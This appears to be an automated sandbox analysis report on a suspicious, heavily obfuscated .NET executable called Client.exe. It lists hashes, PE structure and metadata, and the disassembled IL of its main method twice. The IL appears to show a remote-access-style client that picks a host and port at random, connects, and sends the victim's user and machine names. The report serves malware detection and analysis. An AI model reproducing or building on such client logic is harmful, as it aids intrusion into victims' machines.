Suspicious
Suspect

3eb09496802aaab8b7351b574c30c23a

PE Executable
|
MD5: 3eb09496802aaab8b7351b574c30c23a
|
Size: 312.83 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
3eb09496802aaab8b7351b574c30c23a
Sha1
8188e9a6ebd71f8d8e880b17150218aadfa15664
Sha256
5eb5f76e34f39dc726619b00d1456961c39e1213ddf20507683c04b30bcd636b
Sha384
6b5d52cfee85aba9b3e043a4f20844e4b7b3a1b6909d93b67d33f5c885eaa35a9d19ada942d7806ab6a2ee74b9bf13bf
Sha512
bd7ec66e362f787174978abd83e715f799a90996cf187a8f278b4ee7a0aea3142e1baa8393ea701111ed53351b48565e7553e415ff07c7507149f1eb25ce6772
SSDeep
6144:n/SNznlWXy14nPg8mkvx6hQ89oYaFRzcvbZSkIARKz:/SNznlZnQ87aFCVSksz
TLSH
F464A5253FA59E10D985243ECA7E3A09CB62E0F125026347370AF7A15D059EEDE6C3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
w0kgn9mk1ztocfrr6vunfxe1
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

419

Main Method

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])

Main IL Instruction Count

167

Main IL

ldc.r8 3579 stloc V_3 br IL_004F: br IL_0012 nop <null> ldloc V_3 ldc.r8 3579 ceq <null> brfalse IL_0035: nop nop <null> ldc.r8 3584 stloc V_3 nop <null> ldloc V_3 ldc.r8 3584 ceq <null> brfalse IL_004F: br IL_0012 br IL_0054: call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() br IL_0012: nop call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() call System.Void EJAsZCuMLFcstN.kxbFEqvHHkkbEFCnnEg::rlvSGYxacu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::CfYkmDIkClAerx call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cndoOzVDtEvBdksb() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_007C: ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Void DHgKbieAxMsNZmBPKhsiZyW.BbVrVuWBvUDyQm::uSSjmXAnaL() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Boolean WKYbVPjvlKgtxhNogc.PfEwgwXJnwd::RBuoOHBbGfbjpAdpdF(System.String) brtrue IL_0090: call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() leave IL_0293: ret call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() call System.Void DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::urUZUFyJALXUvk() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brtrue IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::OyAfASQVkYXIbUKbXorZY call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::RbTkVtmhezqdmbnEJtIXMPSyz() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::BIYnfxawjN() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::yCOazJtvNQZprDrznkBIU() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random 
DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::TreIqTtCqraTKqtwMGZDm() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cSgkoxnLhEQNjWwqSZBKa() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OXsBGqYvjRyhPLbGfwPe() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::VDwGXAVnABbL() ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DIrmqwnmVyPCGkPMtFvwYtUv() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::jqCIiQWWVHSOtFSrXzEhEQPG() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::GvgPVKowsHGlenisgl() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::KSGenUbRqNhdGXaHvXTofkZaw() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::wyAAdFBuPOpSavhcUq() ldelem System.String ldloc V_2 ldsfld System.Random DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::cyLCSZMUkNvC(System.String,System.String) ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brfalse IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG 
JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::jhFjBrOWBMWUBIeCHqBSTf ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::ZjaNGiZfoKfmpqyLnGmFb ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::zxeRAxLFtMWo() newarr System.Object dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::fmKcFvDJUPYiCofpw() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cBJgghaJTyznFynf() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OCZlfRgzCRzIi() call System.Byte[] DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::VDUEQQQHRURRDkXobkJRymwe() stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ZRnolFWYnxfhFjyJgQwBHmzu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zxpaYxTWSNi stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::tvGtlKMheJk() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::smqSlOMpaF stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rEropOcGyL() call System.String System.Environment::get_UserName() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::PHtnXRtGMdUgIA() call System.String 
pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AskiLglmStisKQeBmSzaaNHpM() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zUikYgRthCBmCiRkAl stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::MSXXoHhxFAB() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::eAADNDPTdFwtjvVVH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ABsWSIJLgYKNpnzkXn() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::jrywraGGIqjhH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::vVGUTOvFaKMKeAJSyhDvz() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::yoQJVYhTRtOSYSNmkdtrXZ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AYnHKhAIwaSQFGugZHX() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::LTwbyQUhJNookISrhNJaQ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::iBUNgNfVAC() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::IcunUMKUcUhmuzMhSKdfNIyDq stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rkPVhgLENEROlsN() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zTePOWPuRWkbxYbQxIPLS stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DXRIwXwwzDZbxBfHtHafplNA() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::mYWfFwEFDnMoTuHVO stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DJyRmjVSScxjuW() call System.String DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::KxqRMqSiZBloyDOYEApvqX() stelem.ref <null> call System.Byte[] pNiCXJnBMURAHNEa.bZnnVamFrANlYP::SwZrNYQnvdiLDtykVipakCpqo(System.Object[]) callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::oCpsjkCcYxcPPTVKtRYfBzpSu(System.Byte[]) call System.Int32 
JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_009A: ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc pop <null> leave IL_0293: ret ret <null>

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

419

Main Method

System.Void JeAOVxuTQsCF.sjQTpMSxPJE::IbtskpQHRLmLnFqWcSXs(System.String[])

Main IL Instruction Count

167

Main IL

ldc.r8 3579 stloc V_3 br IL_004F: br IL_0012 nop <null> ldloc V_3 ldc.r8 3579 ceq <null> brfalse IL_0035: nop nop <null> ldc.r8 3584 stloc V_3 nop <null> ldloc V_3 ldc.r8 3584 ceq <null> brfalse IL_004F: br IL_0012 br IL_0054: call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() br IL_0012: nop call System.Void JeAOVxuTQsCF.asoFTtyQyi::AripyYMZxORTljVTKe() call System.Void EJAsZCuMLFcstN.kxbFEqvHHkkbEFCnnEg::rlvSGYxacu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::CfYkmDIkClAerx call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cndoOzVDtEvBdksb() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_007C: ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Void DHgKbieAxMsNZmBPKhsiZyW.BbVrVuWBvUDyQm::uSSjmXAnaL() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::tSBOFJacMihjUfODdf call System.Boolean WKYbVPjvlKgtxhNogc.PfEwgwXJnwd::RBuoOHBbGfbjpAdpdF(System.String) brtrue IL_0090: call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() leave IL_0293: ret call System.Void pNiCXJnBMURAHNEa.ERjocsDisAcsTVnUf::skUkVrZtFC() call System.Void DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::urUZUFyJALXUvk() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brtrue IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::OyAfASQVkYXIbUKbXorZY call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::RbTkVtmhezqdmbnEJtIXMPSyz() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::BIYnfxawjN() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::yCOazJtvNQZprDrznkBIU() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random 
DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::TreIqTtCqraTKqtwMGZDm() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cSgkoxnLhEQNjWwqSZBKa() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OXsBGqYvjRyhPLbGfwPe() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::VDwGXAVnABbL() ldelem System.String call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DIrmqwnmVyPCGkPMtFvwYtUv() newarr System.Char dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::jqCIiQWWVHSOtFSrXzEhEQPG() call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::GvgPVKowsHGlenisgl() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::KSGenUbRqNhdGXaHvXTofkZaw() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldloc V_1 call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::wyAAdFBuPOpSavhcUq() ldelem System.String ldloc V_2 ldsfld System.Random DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::iISbmZeXSskcVbwX ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::cyLCSZMUkNvC(System.String,System.String) ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldfld System.Boolean DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::GnyLSulEZtzb brfalse IL_027E: call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG 
JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.AeRMGSSbZljmnVHh DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::jhFjBrOWBMWUBIeCHqBSTf ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc newobj System.Void DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi::.ctor(DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG) stfld DHgKbieAxMsNZmBPKhsiZyW.MVDsfOjUxeKILNi DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::ZjaNGiZfoKfmpqyLnGmFb ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::zxeRAxLFtMWo() newarr System.Object dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::fmKcFvDJUPYiCofpw() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::cBJgghaJTyznFynf() call System.String pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::OCZlfRgzCRzIi() call System.Byte[] DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::VDUEQQQHRURRDkXobkJRymwe() stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ZRnolFWYnxfhFjyJgQwBHmzu() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zxpaYxTWSNi stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::tvGtlKMheJk() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::smqSlOMpaF stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rEropOcGyL() call System.String System.Environment::get_UserName() call System.String JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::PHtnXRtGMdUgIA() call System.String 
pNiCXJnBMURAHNEa.RPsThdhBbTRSxDIRzSYvB::NJloksmwjAKrfwsGWxRH(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AskiLglmStisKQeBmSzaaNHpM() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zUikYgRthCBmCiRkAl stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::MSXXoHhxFAB() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::eAADNDPTdFwtjvVVH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::ABsWSIJLgYKNpnzkXn() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::jrywraGGIqjhH stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::vVGUTOvFaKMKeAJSyhDvz() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::yoQJVYhTRtOSYSNmkdtrXZ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::AYnHKhAIwaSQFGugZHX() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::LTwbyQUhJNookISrhNJaQ stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::iBUNgNfVAC() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::IcunUMKUcUhmuzMhSKdfNIyDq stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::rkPVhgLENEROlsN() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::zTePOWPuRWkbxYbQxIPLS stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DXRIwXwwzDZbxBfHtHafplNA() ldsfld System.String JeAOVxuTQsCF.asoFTtyQyi::mYWfFwEFDnMoTuHVO stelem.ref <null> dup <null> call System.Int32 JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::DJyRmjVSScxjuW() call System.String DHgKbieAxMsNZmBPKhsiZyW.HVrgHIWCebkm::KxqRMqSiZBloyDOYEApvqX() stelem.ref <null> call System.Byte[] pNiCXJnBMURAHNEa.bZnnVamFrANlYP::SwZrNYQnvdiLDtykVipakCpqo(System.Object[]) callvirt System.Void DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG::oCpsjkCcYxcPPTVKtRYfBzpSu(System.Byte[]) call System.Int32 
JeAOVxuTQsCF.xTfAMdmuoEayZuWuxD::oSVdGkGMYKVdSiFS() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_009A: ldsfld DHgKbieAxMsNZmBPKhsiZyW.YDzpMflQVvMImtTG JeAOVxuTQsCF.sjQTpMSxPJE::ocTsVSnOrkaQJMgrbCHrnzc pop <null> leave IL_0293: ret ret <null>

3eb09496802aaab8b7351b574c30c23a (312.83 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
w0kgn9mk1ztocfrr6vunfxe1
Characteristics
No malware configuration was found at this point.